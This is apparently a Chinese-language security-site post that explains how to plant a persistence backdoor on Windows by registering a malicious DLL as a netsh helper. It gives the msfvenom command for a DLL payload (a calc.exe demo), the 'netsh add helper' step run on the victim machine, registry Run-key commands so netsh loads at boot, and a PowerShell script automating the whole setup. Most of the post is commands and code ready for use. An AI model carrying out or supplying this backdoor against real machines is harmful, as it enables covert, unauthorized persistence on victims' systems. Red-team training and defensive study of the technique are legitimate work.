netsh后门

Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上进行修改。可以通过使用DLL文件来扩展Netsh功能。此功能使红色团队可以使用此工具来加载任意DLL,以实现代码执行并因此实现持久性。但是,此技术的实现需要本地管理员级别的特权。

通过msfvenom生成一个dll

msfvenom -p widnows/x64/exec CMD=calc.exe -f dll > test.dll

Mei1yV.png

在受害机执行

netsh add helper <DLL_PATH>

MeiUY9.png

之后netsh一运行就会加载DLL(加载完DLL后自动运行netsh,关闭之后。再此之后执行的netsh都会加载dll)
MeiwS1.png

如果要实现启动系统自动运行netsh,得修改注册表

 reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';

这里我用powershell实现了一个简单的功能

 param (
    [string]$path = "NULL"
 )
 if($path -eq "NULL"){
    Write-Host "netsh.ps1 -path <DLL_path>";
    exit(0);
 }else{
    write-host "[*] reboot run netsh";
    reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh";
    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh';
    netsh add helper $path;
}

推荐开通永久SVIP,享受极致用户体验!官方QQ交流群:859602620
您若发现我们未注明版权信息或侵权请您立即联系我们,我们将以最快的速度删除资源!
黑盟安全门户 » netsh后门